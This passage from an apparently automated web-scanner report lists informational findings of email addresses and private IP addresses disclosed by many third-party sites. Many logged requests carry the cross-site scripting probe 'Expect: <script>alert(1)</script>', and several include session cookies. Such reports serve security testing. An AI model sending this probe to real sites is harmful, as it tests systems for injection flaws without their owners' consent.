User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.momvictress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:45:19 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 501

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...
27.35. http://www.mylovedpee.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedpee.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedpee.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:10:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8707
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:10:24 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Pee Pictures</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedpee.com">
...[SNIP]...
27.36. http://www.mylovedspy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylovedspy.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedspy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Mon, 02 May 2011 00:51:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8666
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Mon, 02 May 2011 00:51:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Spy Pictures</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedspy.com">
...[SNIP]...
27.37. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Top.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Top.htm

Issue detail

The following email address was disclosed in the response:

Request

GET /xtremepowersports/shoppingcart/CheckOut/Top.htm HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSQTSDS=HJJKBIKAPBNGOAEECGELJAAN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:26:58 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 28 May 2009 18:29:21 GMT
ETag: "4ce86638c2dfc91:dd2"
Content-Length: 2762

<html>
<head>
<title>Xtreme Powersports' OEM Parts Finder Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" leftmarg
...[SNIP]...
<a href="mailto:info@xtremepowersports.com"><b><font face="Arial, Helvetica, sans-serif" size="2">info@xtremepowersports.com</font>
...[SNIP]...
27.38. http://www.questcomp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questcomp.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.questcomp.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@quest-comp.com" on "2009.02.12T17:15-0700" exp "2010.12.31T12:00-0700" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:19:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...
27.39. http://www.rtvchannel.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rtvchannel.tv
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rtvchannel.tv
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:46:55 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 512
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:info@rtvchannel.tv">
...[SNIP]...
27.40. http://www.sadocabin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sadocabin.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sadocabin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Mon, 02 May 2011 00:30:50 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 326

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...
27.41. http://www.sassieshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sassieshop.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sassieshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Mon, 02 May 2011 00:25:10 GMT
Server: Apache
Content-Length: 504
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:support@surfmerchants.com">
...[SNIP]...
27.42. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_footer.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_footer.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-adv/jobs4/javascript/jobs_footer.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Fri, 17 Sep 2010 18:47:39 GMT
ETag: "1ec4-4c93b7cb"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:33:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:33:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 7876

function showGlobalFooter(node) {
   //_gnpost.timesThrough = 1;
   //placeChannelNav(node);
   //commenting out new footer
   //document.write("<div style='width:970' id='footer'>");
   //document.write("
...[SNIP]...
<a href="mailto:ombudsman@washpost.com">
...[SNIP]...
27.43. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jqModal.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jqModal.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-adv/jobs4/javascript/jqModal.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Wed, 11 Aug 2010 19:50:53 GMT
ETag: "1664-4c62ff1d"
Accept-Ranges: bytes
Expires: Sun, 01 May 2011 23:32:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 01 May 2011 23:32:55 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 5732

/* SCREEN FUNCTIONS */
/* these functions are to override the way jquery gets the height/width of the body of the page so that the jqModal windows will work in IE7 */
/* functions are from javascr
...[SNIP]...
<bhb@iceburg.net>
...[SNIP]...
27.44. http://www.xhost.ro/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xhost.ro
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xhost.ro
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Sun, 01 May 2011 23:58:07 GMT
Server: Apache
Content-Length: 488
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...
<a href="mailto:suport@xhost.ro">
...[SNIP]...
28. Private IP addresses disclosed  previous  next
There are 20 instances of this issue:

28.1. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "54c234152c694596eeea7cc18ee6626b"
X-FB-Server: 10.32.104.129
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=177
Expires: Sun, 01 May 2011 23:36:08 GMT
Date: Sun, 01 May 2011 23:33:11 GMT
Connection: close
Content-Length: 18453

/*1303860379,169896065,JIT Construction: v371127,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
28.2. http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.facebook.com
Path:   /js/api_lib/v0.4/XdCommReceiver.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/XdCommReceiver.js?2 HTTP/1.1
Host: static.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-adv/jobs4/html/xd_receiver.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
X-FB-Server: 10.30.145.197
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: max-age=612242
Expires: Mon, 09 May 2011 01:38:46 GMT
Date: Sun, 01 May 2011 23:34:44 GMT
Connection: close
Content-Length: 3386

/**
* NOTE - this file should be editted at
* /lib/connect/Facebook/XdComm/XdCommReceiver.js
* which will rewrite any library file connect is autogened
*
* @provides XdCommReceiver
* @requi
...[SNIP]...
28.3. http://www.bucadibeppo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bucadibeppo.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bucadibeppo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 584926432
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 00:06:14 GMT
Via: 1.1 varnish 172.17.34.80
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
28.4. http://www.cupcakesandcashmere.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cupcakesandcashmere.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cupcakesandcashmere.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 252453132
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:55:49 GMT
Via: 1.1 varnish 172.17.35.60
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
28.5. http://www.encomer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.encomer.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.encomer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1324502344
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Sun, 01 May 2011 23:42:13 GMT
Via: 1.1 varnish 172.17.35.80
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
28.6. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.21.60
X-Cnection: close
Date: Sun, 01 May 2011 23:32:46 GMT
Content-Length: 0

28.7. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=1bce446ae7066140a11bdbb8de657dd9&extern=0&channel=http%3A%2F%2Fwww.washingtonpost.com%2Fwp-adv%2Fjobs4%2Fhtml%2Fxd_receiver.htm&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.41
X-Cnection: close
Date: Sun, 01 May 2011 23:33:41 GMT
Content-Length: 1235

<script>document.domain = "facebook.com";</script><script src="http://static.ak.connect.facebook.com/connect.php/en_US"></script><script>
var config = {"base_domain":"washingtonpost.com","channe
...[SNIP]...
28.8. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.138.43
X-Cnection: close
Date: Sun, 01 May 2011 23:33:51 GMT
Content-Length: 0

28.9. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.142.59
X-Cnection: close
Date: Sun, 01 May 2011 23:32:35 GMT
Content-Length: 0

28.10. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
28.11. http://www.gohawaii.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gohawaii.com
Path:   /favicon.ico

Issue detail

